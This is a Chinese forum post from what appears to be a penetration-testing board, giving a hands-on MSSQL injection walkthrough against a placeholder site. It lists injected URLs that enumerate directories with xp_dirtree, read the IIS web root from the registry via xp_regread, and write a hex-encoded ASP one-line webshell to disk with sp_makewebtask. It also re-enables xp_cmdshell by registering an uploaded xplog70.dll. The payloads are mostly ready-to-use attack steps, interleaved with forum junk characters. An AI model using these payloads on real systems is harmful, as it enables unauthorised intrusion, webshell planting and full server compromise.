找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 MSsqlL注入取得网站路径最好的方法
返回列表 发新帖
查看: 3342|回复: 0
打印 上一主题 下一主题

MSsqlL注入取得网站路径最好的方法

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-13 17:20:30 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
好,我们exec master..xp_dirtree'd:/test'" }% Z' |9 N# u
假设我们在test里有两个文件夹test1和test2在test1里又有test3
" r; T9 N( ~) q2 n结果显示' U" ~  s# R! y4 X' U% U

6 L% `9 @1 t4 J$ @' ]$ \3 ?subdirectory depth* j& Y; a5 Z8 z3 h: q0 M& P5 M
test1 15 X% }) i; O4 Y: _
test3 29 i3 z& Z) I" S
test2 1
8 S; p& h$ }( H: x# N" [
8 X7 j; u5 R: U3 s, @哈哈发现没有那个depth就是目录的级数
) ^4 q9 @. T3 H# Rok了,知道怎么办了吧2 a; ^+ ]( v, c% R
- ~$ q6 q, G5 I/ c% S1 n2 [) B
http://www.xxxxx.com/down/list.asp?id=1;create table dirs(paths varchar(1000),id int)--
* }! Z4 m9 w0 }2 Uhttp://www.xxxxx.com/down/list.asp?id=1;insert dirs exec master.dbo.xp_dirtree 'd:\' --
* w, e. |2 L8 c' Y3 B  F$ i' @9 hhttp://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs where id=1)-6 Y. ^7 y3 o" u# U' n

+ P8 n! U4 Y" q" J只要加上id=1,就是第一级目录 。
0 l3 v: H# `/ O' B: \3 m3 p9 p. U4 k- p/ k
  X9 T' b- O6 L' Q- b3 m7 \0 l9 f3 e" T" a% [4 Q7 B1 u: m
通过注册表读网站路径:7 g/ y) R+ Y+ H& {, h$ _: C. A
! t, z4 ~$ z4 F, u
1.;create table [dbo].[cyfd] ([gyfd][char](255));5 Z0 G( B  _9 ]8 K
- u  [5 k6 j6 j7 k8 j: _
2.DECLARE @result varchar(255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE', 'SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots', '/', @result output insert into 临时表 (临时字段名) values(@result);--5 D4 C7 n# ]; }8 |! A$ S/ C: |8 C
id=2;DECLARE @result varchar(255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots', '/', @result output insert into cyfd (gyfd) values(@result);--6 F$ ~, x4 p% g1 P6 M7 q4 e
8 V: t: k9 m, L; l  X$ Q, n5 W6 g
3.and 1=(select count(*) from 临时表 where 临时字段名>1)3 |- C; }0 i; d# z$ v- n/ P
and 1=(select count(*) from cyfd where gyfd > 1)
+ m! g6 k% ]4 R/ }. y9 _: e, |这样IE报错,就把刚才插进去的Web路径的值报出来了
0 C. k- v, j- v0 t* |: U  F9 k' w% Q, K7 \* Q
4.drop table cyfd;-- 删除临时表
1 K- i7 J, J$ ?0 [5 k  P  g: m9 t1 t( d3 B8 U9 q" k$ [( q, U6 a
获得webshell方法:" J  M" G  y4 g' Y0 W8 G6 p
1.create table cmd (a image)-- \**cmd是创建的临时表) g- a4 X- x' y4 d% O8 C

. i! r( I; p4 ?4 @+ R3 O' o2.insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)-- 往cmd表里插入一句话
; d2 O9 |# H/ X- g1 B% Z" {- K) g+ p9 f
4 l! R6 G' U8 @0 H" R; _+ u$ M
3.EXECUTE sp_makewebtask @outputfile = 'WEB绝对路径\导出的文件名.asp',@query = 'SELECT image FROM cmd'* c' `9 d; W8 O1 O' u6 j& l
EXECUTE sp_makewebtask @outputfile = 'WEB绝对路径\导出的文件名.asp',@query = 'SELECT 你的字段 FROM 你建的临时表'% d1 U" q5 Z0 k7 B

% |8 a, z( @  C4.drop table cmd;-- 删除cmd临时表4 U8 J& c3 y( I" R- O% k3 \

6 y$ a. d$ E; x  V3 _  s$ x$ h7 }& A" c恢复xp_cmdshell方法之一:
" P/ R9 P% P* _" w+ u9 \我很快就把xplog70.dll文件给他上传到e:\inetpub\wwwroot目录下了,来吧,我们来给他恢复,提交:. v6 o7 n' p. g  e. A  @( [8 i
http://www.something.com/script.asp?id=2;EXEC master.dbo.sp_addextendedproc 'xp_cmdshell','e:\inetpub\wwwroot\xplog70.dll'3 h6 n, ]+ T$ ]8 I
恢复,支持绝对路径的恢复哦。:)
7 M/ Z6 ^1 w& X# T
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表